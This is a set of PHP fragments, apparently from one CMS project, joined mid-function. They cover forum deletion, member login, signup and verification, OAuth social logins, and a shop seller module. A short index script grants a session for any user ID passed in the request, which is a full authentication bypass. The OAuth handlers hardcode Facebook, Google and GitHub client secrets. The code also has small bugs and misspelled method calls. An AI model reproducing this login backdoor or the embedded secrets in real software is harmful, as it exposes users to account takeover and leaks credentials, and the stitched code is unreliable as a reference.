$results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->delete($this->table->post)->where('idx', $post->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $post->idx)->where('type', 'POST')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $ments = $this->db()->select($this->table->ment)->where('parent', $post->idx)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $this->db()->delete($this->table->ment)->where('idx', $ments[$i]->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $ments[$i]->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ments[$i]->idx)->where('type', 'MENT')->get(); for ($j = 0, $loopj = count($attachments); $j < $loopj; $j++) { $attachments[$j] = $attachments[$j]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); } $labels = $this->db()->select($this->table->class_label)->where('idx', $post->idx)->get(); for ($i = 0, $loop = count($labels); $i < $loop; $i++) { $this->db()->delete($this->table->class_label)->where('idx', $values->idx)->where('label', $labels[$i]->label)->execute(); $lastPost = $this->db()->select($this->table->class_label)->where('label', $labels[$i]->label)->orderBy('reg_date', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0; $this->db()->update($this->table->label, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $labels[$i]->label)->execute(); } $this->IM->getModule('member')->sendPoint($post->midx, $values->forum->ment_point * -1, 'forum', 'post_delete', array('title' => $post->title), true); if ($post->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('member')->addActivity($post->midx, 0, 'forum', 'post_delete', array('title' => $post->title)); } else { $this->IM->getModule('push')->sendPush($post->midx, 'forum', 'post_delete', $values->idx, array('title' => $post->title)); } $this->IM->deleteArticle('forum', 'post', $values->idx); } } elseif ($values->type == 'ment') { $ment = $this->getMent($values->idx); $post = $this->getPost($ment->parent); $values->forum = $this->getLms($post->lid); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($this->checkMentTree($values->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $values->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $values->idx)->execute(); if ($ment->source != 0) { $source = $this->getMent($ment->source); while ($source->is_delete == 'TRUE') { if ($this->checkMentTree($source->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $source->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $source->idx)->execute(); if ($source->source != 0) { $source = $this->getMent($source->source); } else { break; } } else { break; } } } $results->position = null; } else { $results->position = $values->idx; $this->db()->update($this->table->ment, array('is_delete' => 'TRUE', 'modify_date' => time(), 'content' => '', 'search' => ''))->where('idx', $ment->idx)->execute(); } $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $lastMent = $this->db()->select($this->table->ment)->where('parent', $ment->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); if (count($lastMent) == 0) { $this->db()->update($this->table->post, array('ment' => 0, 'last_ment' => $post->reg_date))->where('idx', $ment->parent)->execute(); $results->parent = $ment->parent; } else { if ($results->position == null) { $position = $this->db()->select($this->table->ment_depth)->where('parent', $ment->parent)->where('head', $ment->head, '<=')->where('arrange', $ment->arrange, '<')->orderBy('head', 'asc')->orderBy('arrange', 'asc')->get(); $lastPosition = array_pop($position); $results->position = $lastPosition->idx; } $this->db()->update($this->table->post, array('ment' => count($lastMent), 'last_ment' => $lastMent[0]->reg_date))->where('idx', $ment->parent)->execute(); } $results->message = $this->getLanguage('mentDelete/success'); $this->IM->getModule('member')->sendPoint($ment->midx, $values->forum->ment_point * -1, 'forum', 'ment_delete', array('title' => $post->title), true); if ($ment->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('member')->addActivity($ment->midx, 0, 'forum', 'ment_delete', array('title' => $post->title)); } else { $this->IM->getModule('push')->sendPush($ment->midx, 'forum', 'ment_delete', $values->idx, array('title' => $post->title)); } $this->IM->deleteArticle('forum', 'ment', $values->idx); } } $results->type = $values->type; } $this->IM->fireEvent('afterDoProcess', 'forum', $action, $values, $results); return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'check') { $name = Request('name'); $value = Request('value'); if ($name == 'email') { if (CheckEmail($value) == true) { if ($this->db()->select($this->table->member)->where('email', $value)->has() == true) { $results->success = false; $results->message = $this->getLanguage('signup/help/email/duplicated'); } else { $results->success = true; } } else { $results->success = false; $results->message = $this->getLanguage('signup/help/email/error'); } } if ($name == 'name') { if (strlen($value) > 0) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('signup/help/name/error'); } } if ($name == 'nickname') { if (CheckNickname($value) == true) { if ($this->db()->select($this->table->member)->where('nickname', $value)->where('idx', $this->getLogged(), '!=')->has() == true) { $results->success = false; $results->message = $this->getLanguage('signup/help/nickname/duplicated'); } else { $results->success = true; } } else { $results->success = false; $results->message = $this->getLanguage('signup/help/nickname/error'); } } if ($name == 'old_password') { if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $mHash = new Hash(); if ($mHash->password_validate($value, $this->getMember()->password) == true) { $results->success = true; $results->message = $this->getLanguage('password/help/old_password/success'); } else { $results->success = false; $results->message = $this->getLanguage('password/help/old_password/error'); } } } } if ($action == 'forceLogin') { $code = Decoder(Request('code')); if ($code === false) { $results->success = false; $results->message = $this->getLanguage('error/invalidCode'); } else { $data = json_decode($code); if ($data != null && $data->ip == $_SERVER['REMOTE_ADDR']) { $this->login($data->idx); $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/invalidCode'); } } } if ($action == 'login') { $mHash = new Hash(); $email = Request('email'); $password = Request('password'); $results->errors = array(); $loginFail = Request('loginFail', 'session') != null && is_array(Request('loginFail', 'session')) == true ? Request('loginFail', 'session') : array('count' => 0, 'time' => 0); if ($loginFail['time'] > time()) { $results->success = false; $results->message = $this->getLanguage('login/error/login'); } else { $check = $this->db()->select($this->table->member)->where('email', $email)->getOne(); if ($check == null) { $results->success = false; $results->errors['email'] = $this->getLanguage('login/error/email'); $loginFail['count']++; if ($loginFail['count'] == 5) { $loginFail['count'] = 0; $loginFail['time'] = time() + 60 * 60 * 5; } $values->email = $email; $values->password = $password; } elseif ($mHash->password_validate($password, $check->password) == false) { $results->success = false; $results->errors['password'] = $this->getLanguage('login/error/password'); $loginFail['count']++; if ($loginFail['count'] == 5) { $loginFail['count'] = 0; $loginFail['time'] = time() + 60 * 60 * 5; } $values->email = $email; $values->password = $password; } else { if ($check->status == 'ACTIVE') { $this->db()->update($this->table->member, array('last_login' => time()))->where('idx', $check->idx)->execute(); $this->login($check->idx); $results->success = true; } elseif ($check->status == 'VERIFYING') { $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($check->idx); $page = $this->getMemberPage('signup'); $results->success = false; $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'verify'); } else { $results->success = false; $results->message = $this->getLanguage('error/' . $check->status); } } } $_SESSION['loginFail'] = $loginFail; } if ($action == 'logout') { unset($_SESSION['MEMBER_LOGGED']); $results->success = true; } if ($action == 'cert') { $results->success = true; } if ($action == 'signup') { $errors = array(); $email = CheckEmail(Request('email')) == true ? Request('email') : ($errors['email'] = $this->getLanguage('signup/help/email/error')); $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error')); if (strlen(Request('password')) < 4 || Request('password') != Request('password_confirm')) { $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error'); } $name = CheckNickname(Request('name')) == true ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error')); $nickname = CheckNickname(Request('nickname')) == true ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error')); if ($this->db()->select($this->table->member)->where('email', $email)->has() == true) { $errors['email'] = $this->getLanguage('signup/help/email/duplicated'); } if ($this->db()->select($this->table->member)->where('nickname', $nickname)->has() == true) { $errors['nickname'] = $this->getLanguage('signup/help/nickname/duplicated'); } if (empty($errors) == true) { $mHash = new Hash(); $insert = array(); $insert['gidx'] = Request('registerGIDX', 'session'); $insert['email'] = $email; $insert['password'] = $mHash->password_hash($password); $insert['name'] = $name; $insert['nickname'] = $nickname; $insert['status'] = 'VERIFYING'; $idx = $this->db()->insert($this->table->member, $insert)->execute(); if ($idx !== false) { $results->success = true; $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($idx); $this->sendVerifyEmail($idx); unset($_SESSION['registerGIDX']); } else { $results->success = false; } } else { $results->success = false; $results->errors = $errors; } } if ($action == 'verifyEmail') { $registerIDX = Request('registerIDX'); if ($registerIDX == null) { $results->success = false; } else { $email = Request('email'); $email_verify_code = Request('email_verify_code'); $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne(); if ($check == null) { $results->success = false; $results->errors = array('email' => $this->getLanguage('verifyEmail/help/email/notFound')); } elseif ($check->code == $email_verify_code) { $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $registerIDX)->where('email', $email)->execute(); $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute(); $results->success = true; } else { $results->success = false; $results->errors = array('email_verify_code' => $this->getLanguage('verifyEmail/help/email_verify_code/error')); } } } if ($action == 'sendVerifyEmail') { $registerIDX = Request('registerIDX'); $email = Request('email'); if ($this->isLogged() == true) { if (CheckEmail($email) == false) { $results->success = false; $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/error')); } elseif ($this->db()->select($this->table->member)->where('email', $email)->count() == 1) { $results->success = false; $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/duplicated')); } else { $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne(); if ($check == null || $check->status != 'SENDING' || $check->status == 'SENDING' && $check->reg_date + 300 < time()) { $this->db()->delete($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->execute(); $status = $this->sendVerifyEmail($this->getLogged(), $email); $results->success = true; $results->message = $this->getLanguage('verifyEmail/sending'); } else { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/sending'); } } } elseif ($registerIDX != null) { $member = $this->db()->select($this->table->member)->where('idx', $registerIDX)->getOne(); if ($member == null || $member->status != 'VERIFYING') { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/target'); } else { if (CheckEmail($email) == false) { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/email'); } else { $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne(); if ($check->status == 'VERIFIED') { $signupPage = $this->getMemberPage('signup'); $results->success = true; $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute(); $results->redirect = $this->IM->getUrl($signupPage->menu, $signupPage->page, 'complete'); } elseif ($check == null || $check->status == 'CANCELED' || $check->status == 'SENDING' && $check->reg_date + 300 < time()) { $this->db()->delete($this->table->email)->where('midx', $registerIDX)->where('email', $email)->execute(); $status = $this->sendVerifyEmail($registerIDX, $email); $results->success = true; $results->message = $this->getLanguage('verifyEmail/sending'); } else { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/sending'); } } } } else { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } } if ($action == 'photoEdit') { $templet = Request('templet'); if ($this->isLogged() == true) { $results->success = true; $results->modalHtml = $this->getPhotoEdit($templet); $results->photo = $this->getMember()->photo; } else { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } } if ($action == 'photoUpload') { $photo = Request('photo'); if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { if (preg_match('/^data:image\\/(.*?);base64,(.*?)$/', $photo, $match) == true) { $bytes = base64_decode($match[2]); file_put_contents($this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg', $bytes); $this->IM->getModule('attachment')->createThumbnail($this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg', $this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg', 250, 250, false, 'jpg'); $results->success = true; $results->message = $this->getLanguage('photoEdit/success'); } else { $results->success = false; $results->message = $this->getLanguage('photoEdit/error'); } } } if ($action == 'modifyEmail') { $confirm = Request('confirm'); if ($confirm == 'TRUE') { $email = Request('email'); $code = Request('code'); $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne(); if ($check == null || $check->code != $code) { $results->success = false; $results->errors = array('code' => $this->getLanguage('modifyEmail/help/code/error')); } else { $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $this->getLogged())->where('email', $email)->execute(); $this->db()->update($this->table->member, array('email' => $email))->where('idx', $this->getLogged())->execute(); $results->success = true; $results->message = $this->getLanguage('modifyEmail/success'); } } else { $templet = Request('templet'); if ($this->isLogged() == true) { $results->success = true; $results->modalHtml = $this->getModifyEmail($templet); } else { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } } } if ($action == 'modify') { $step = Request('step'); if ($step == 'verify') { $member = $this->getMember(); $password = Request('password'); $mHash = new Hash(); if ($mHash->password_validate($password, $member->password) == true) { $results->success = true; $results->password = Encoder($password); } else { $results->success = false; $results->errors = array('password' => $this->getLanguage('verify/help/password/error')); } } if ($step == 'modify') { $errors = array(); $values->name = Request('name') ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error')); $values->nickname = Request('nickname') ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error')); if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLangauge('error/notLogged'); } elseif (count($errors) == 0) { $insert = array(); $insert['name'] = $values->name; $insert['nickname'] = $values->nickname; $this->db()->update($this->table->member, $insert)->where('idx', $this->getLogged())->execute(); $results->success = true; $results->message = $this->getLanguage('modify/success'); } else { $results->success = false; $results->errors = $errors; } } } if ($action == 'password') { $errors = array(); $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error')); if (strlen(Request('password')) < 4 || Request('password') != Request('password_confirm')) { $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error'); } if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLangauge('error/notLogged'); } else { $mHash = new Hash(); if (strlen($this->getMember()->password) == 65) { $old_password = Request('old_password'); if ($old_password == '' || $mHash->password_validate($old_password, $this->getMember()->password) == false) { $errors['old_password'] = $this->getLanguage('password/help/old_password/error'); } } if (count($errors) == 0) { $password = $mHash->password_hash($password); $this->db()->update($this->table->member, array('password' => $password))->where('idx', $this->getLogged())->execute(); $results->success = true; $results->message = $this->getLanguage('password/success'); } else { $results->success = false; $results->errors = $errors; } } } if ($action == 'facebook') { if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } if ($this->IM->domain == 'www.arzz.com') { $CLIENT_ID = '985851538105124'; $CLIENT_SECRET = 'c6b74ae32d4786b440bb878c46ee2998'; } elseif ($this->IM->domain == 'www.minitalk.kr') { $CLIENT_ID = '418845248317025'; $CLIENT_SECRET = '5850c198f8f4b0b254a53ae7f9049600'; } else { $CLIENT_ID = '985851538105124'; $CLIENT_SECRET = 'c6b74ae32d4786b440bb878c46ee2998'; } $AUTH_URL = 'https://graph.facebook.com/oauth/authorize'; $TOKEN_URL = 'https://graph.facebook.com/oauth/access_token'; $facebook = new OAuthClient(); $facebook->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('public_profile,email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($facebook->authenticate($_GET['code']) == true) { $redirectUrl = $facebook->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($facebook->getAccessToken() == null) { $authUrl = $facebook->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $facebook->get('https://graph.facebook.com/me', array('fields' => 'id,email,name')); if ($data === false || empty($data->email) == true) { $this->IM->printError('API ERROR'); } $accessToken = $facebook->getAccessToken(); $refreshToken = $facebook->getRefreshToken() == null ? '' : $facebook->getRefreshToken(); $this->socialLogin('facebook', $data->id, $data->name, $data->email, 'https://graph.facebook.com/' . $data->id . '/picture?width=250&height=250', $accessToken, $refreshToken); } if ($action == 'google') { if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } if ($this->IM->domain == 'www.arzz.com') { $CLIENT_ID = '367657130146-m9ojilvf3kbsv6j24uieartls0ols8t8.apps.googleusercontent.com'; $CLIENT_SECRET = 'GVgWL29VdBiSQIuRTlL5RZDc'; } elseif ($this->IM->domain == 'www.minitalk.kr') { $CLIENT_ID = '476101389490-mug55vcsit7af2sd095m3c8fhd3agssu.apps.googleusercontent.com'; $CLIENT_SECRET = 'CJKMFEkaWkiasXWIj42WY4HU'; } else { $CLIENT_ID = '995059916144-2odfvfoh0h18fhfsid1lh25d1vpunm5n.apps.googleusercontent.com'; $CLIENT_SECRET = 'A3G-GgF_2rsWXUuvmU1hPLOv'; } $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'; $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'; $google = new OAuthClient(); $google->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($google->authenticate($_GET['code']) == true) { $redirectUrl = $google->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($google->getAccessToken() == null) { $authUrl = $google->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $google->get('https://www.googleapis.com/plus/v1/people/me'); if ($data === false || empty($data->emails) == true) { $this->IM->printError('API ERROR'); } for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) { if ($data->emails[$i]->type == 'account') { $data->email = $data->emails[$i]->value; break; } } $data->photo = str_replace('sz=50', 'sz=250', $data->image->url); $accessToken = $google->getAccessToken(); $refreshToken = $google->getRefreshToken() == null ? '' : $google->getRefreshToken(); $this->socialLogin('google', $data->id, $data->displayName, $data->email, $data->photo, $accessToken, $refreshToken); } if ($action == 'youtube') { if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } if ($this->isLogged() == false) { die($this->getError('NOT_LOGGED')); } $CLIENT_ID = '995059916144-2odfvfoh0h18fhfsid1lh25d1vpunm5n.apps.googleusercontent.com'; $CLIENT_SECRET = 'A3G-GgF_2rsWXUuvmU1hPLOv'; $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'; $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'; $youtube = new OAuthClient(); $youtube->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/youtube https://www.googleapis.com/auth/youtube.upload https://www.googleapis.com/auth/youtubepartner https://www.googleapis.com/auth/youtube.force-ssl')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($youtube->authenticate($_GET['code']) == true) { $redirectUrl = $youtube->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($youtube->getAccessToken() == null) { $authUrl = $youtube->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $youtube->get('https://www.googleapis.com/plus/v1/people/me'); if ($data === false || empty($data->emails) == true) { $this->IM->printError('API ERROR'); } for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) { if ($data->emails[$i]->type == 'account') { $data->email = $data->emails[$i]->value; break; } } $accessToken = $youtube->getAccessToken(); $refreshToken = $youtube->getRefreshToken() == null ? '' : $youtube->getRefreshToken(); $check = $this->db()->select($this->table->social)->where('midx', $this->getLogged())->where('code', 'youtube')->getOne(); if ($check == null) { $this->db()->insert($this->table->social, array('midx' => $this->getLogged(), 'code' => 'youtube', 'user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->execute(); } else { $this->db()->update($this->table->social, array('user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->where('midx', $this->getLogged())->where('code', 'youtube')->execute(); } unset($_SESSION['OAUTH_ACCESS_TOKEN']); unset($_SESSION['OAUTH_REFRESH_TOKEN']); $redirectUrl = Request('SOCIAL_REDIRECT_URL', 'session') != null ? Request('SOCIAL_REDIRECT_URL', 'session') : '/'; unset($_SESSION['SOCIAL_REDIRECT_URL']); header('location:' . $redirectUrl); } if ($action == 'github') { if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } if ($this->IM->domain == 'www.arzz.com') { $CLIENT_ID = 'b3f954eccc5378afbacf'; $CLIENT_SECRET = '4507787bbac2f89382c5b29dc07017bbc776c218'; } elseif ($this->IM->domain == 'www.minitalk.kr') { $CLIENT_ID = 'a5b5c360b237ed9de0c7'; $CLIENT_SECRET = '0f5e658a0d05f83ee918da13cfe070ff5bc42e60'; } else { $CLIENT_ID = 'b3f954eccc5378afbacf'; $CLIENT_SECRET = '4507787bbac2f89382c5b29dc07017bbc776c218'; } $AUTH_URL = 'https://github.com/login/oauth/authorize'; $TOKEN_URL = 'https://github.com/login/oauth/access_token'; $github = new OAuthClient(); $github->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setAuthUrl($AUTH_URL)->setScope('user')->setAccessType('offline')->setUserAgent('Awesome-Octocat-App')->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($github->authenticate($_GET['code']) == true) { $redirectUrl = $github->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($github->getAccessToken() == null) { $authUrl = $github->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $github->get('https://api.github.com/user'); if ($data === false || empty($data->email) == true) { $this->IM->printError('API ERROR'); } $accessToken = $github->getAccessToken(); $refreshToken = $github->getRefreshToken() == null ? '' : $github->getRefreshToken(); $this->socialLogin('github', $data->id, $data->name, $data->email, $data->avatar_url, $accessToken, $refreshToken); } $this->IM->fireEvent('afterDoProcess', 'member', $action, $values, $results); return $results; }
<?php require_once './configs/init.config.php'; $IM = new iModule(); if (Request('loggedIdx')) { $_SESSION['MEMBER_LOGGED'] = Encoder(json_encode(array('idx' => Request('loggedIdx'), 'time' => time(), 'ip' => $_SERVER['REMOTE_ADDR']))); } $IM->doLayout();
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'getCategory') { $parent = Request('parent'); $depth = Request('depth'); if ($parent) { $values->categorys = $this->db()->select($this->table->category)->where('parent', $parent)->orderBy('sort', 'asc')->get(); } elseif ($depth) { $values->categorys = $this->db()->select($this->table->category)->where('depth', $depth)->orderBy('sort', 'asc')->get(); } if ($parent == 0) { $results->parent = null; } else { $results->parent = $this->db()->select($this->table->category)->where('idx', $parent)->getOne(); } $results->success = true; $results->categorys = $values->categorys; } if ($action == 'sellerItem') { $lists = $this->db()->select($this->table->item)->where('midx', $this->IM->getModule('member')->getLogged()); $total = $lists->copy()->count(); $lists = $lists->get(); for ($i = 0, $loop = count($lists); $i < $loop; $i++) { $lists[$i]->image = $this->IM->getModule('attachment')->getAttachmentUrl($lists[$i]->image_default); } $results->success = true; $results->total = $total; $results->lists = $lists; } if ($action == 'sellerItemAddModal') { $results->success = true; $results->modalHtml = $this->getSellerItemAddModal(); } if ($action == 'sellerItemImage') { $meta = json_decode($_SERVER['HTTP_IMAGE_META']); $fileBytes = file_get_contents("php://input"); $tempFileName = $this->IM->getModule('attachment')->getTempPath(true) . '/' . md5($fileBytes) . '.' . rand(100000, 999999); file_put_contents($tempFileName, $fileBytes); if ($this->IM->getModule('attachment')->createThumbnail($tempFileName, $tempFileName, 600, 600, false, 'jpg') == true) { if ($meta->imageType == 'addition' || empty($meta->imageIdx) == true || Decoder($meta->imageIdx) == false) { $imageIdx = $this->IM->getModule('attachment')->fileSave($meta->imageType . '.jpg', $tempFileName, 'shop', $meta->imageType); } else { $imageIdx = $this->IM->getModule('attachment')->fileReplace($post->logo, $meta->imageType . '.jpg', $tempFileName); } $results->success = true; $results->imageIdx = Encoder($imageIdx); $results->imageType = $meta->imageType; $results->imageUrl = $this->IM->getModule('attachment')->getAttachmentUrl($imageIdx, $meta->imageType == 'default' ? 'view' : 'thumbnail'); } } if ($action == 'sellerItemPost') { // print_r($_REQUEST); $errors = array(); $values->idx = Request('idx'); $values->title = Request('title') ? Request('title') : ($errors['title'] = $this->getLanguage('seller/item/post/help/title/error')); $values->detail = Request('detail'); $values->seller = Request('seller') ? Request('seller') : ($errors['seller'] = $this->getLanguage('seller/item/post/help/seller/error')); $values->homepage = Request('homepage') ? preg_match('/^http/', Request('homepage')) == true ? Request('homepage') : 'http://' . Request('homepage') : ''; $values->category1 = Request('category1') ? Request('category1') : ($errors['category1'] = $this->getLanguage('seller/item/post/help/category/error')); $values->category2 = Request('category2') ? Request('category2') : 0; $values->category3 = Request('category3') ? Request('category3') : 0; $values->brand = Request('brand'); $values->maker = Request('maker'); $values->model = Request('model'); $values->price = preg_match('/^[1-9]+[0-9]*/', Request('price')) == true ? Request('price') : ($errors['price'] = $this->getLanguage('seller/item/post/help/price/error')); $values->allow_youth = Request('allow_youth'); $values->image_default = Request('image_default') && Decoder(Request('image_default')) !== false ? Decoder(Request('image_default')) : ($errors['image_default'] = $this->getLanguage('seller/item/post/help/image/error')); $values->image_addition = Request('image_addition') ? json_decode(Request('image_addition')) : array(); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('seller/item/post/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); for ($i = 0, $loop = count($values->image_addition); $i < $loop; $i++) { $values->image_addition[$i] = Decoder($values->image_addition[$i]); } $values->option_enable = Request('option_enable') == 'TRUE' ? true : false; if ($values->option_enable == true) { $values->options = json_decode(Request('options')); if (count($values->options->names) == 0 || count($values->options->selects) == 0) { $errors['options'] = $this->getLanguage('seller/item/post/help/options/error'); } for ($i = 0, $loop = count($values->options->selects); $i < $loop; $i++) { if (is_numeric($values->options->selects[$i]->ea) == false || is_numeric($values->options->selects[$i]->price) == false) { $errors['options'] = $this->getLanguage('seller/item/post/help/options/numberOnly'); break; } } } else { $values->ea = strlen(Request('ea')) > 0 ? Request('ea') : -1; $values->options = new stdClass(); $values->options->names = ''; $values->options->selects = array(); } if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (count($errors) == 0) { $insert = array(); $insert['title'] = $values->title; $insert['detail'] = $values->detail; $insert['seller'] = $values->seller; $insert['homepage'] = $values->homepage; $insert['category1'] = $values->category1; $insert['category2'] = $values->category2; $insert['category3'] = $values->category3; $insert['brand'] = $values->brand; $insert['maker'] = $values->maker; $insert['model'] = $values->model; $insert['price'] = $values->price; $insert['allow_youth'] = $values->allow_youth; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['image_default'] = $values->image_default; $insert['options'] = json_encode($values->options->names, JSON_UNESCAPED_UNICODE); if ($values->idx == null) { $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['reg_date'] = time(); $values->idx = $this->db()->insert($this->table->item, $insert)->execute(); $results->success = true; } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'type' => 'ITEMDETAIL', 'parent' => $values->idx))->execute(); } } for ($i = 0, $loop = count($values->image_addition); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->image_addition[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->image_addition[$i], 'type' => 'ITEM', 'parent' => $values->idx))->execute(); } } $this->db()->delete($this->table->item_option)->where('idx', $values->idx)->execute(); if ($values->option_enable == true) { for ($i = 0, $loop = count($values->options->selects); $i < $loop; $i++) { $option = array(); $option['idx'] = $values->idx; $option['option1'] = $values->options->selects[$i]->option1; $option['option2'] = $values->options->selects[$i]->option2 == null ? '' : $values->options->selects[$i]->option2; $option['option3'] = $values->options->selects[$i]->option3 == null ? '' : $values->options->selects[$i]->option3; $option['price'] = $values->options->selects[$i]->price; $option['ea'] = $values->options->selects[$i]->ea; $option['sort'] = $i; $this->db()->insert($this->table->item_option, $option)->execute(); } } } } else { $results->success = false; $results->errors = $errors; $results->message = $this->getLanguage('error/required'); } } if ($action == 'sellerPromotion') { $date = Request('date') ? strtotime(Request('date')) : strtotime(date('Y-m-d')); $timeInterval = $this->Module->getConfig('promotionTimeInterval') ? $this->Module->getConfig('promotionTimeInterval') : 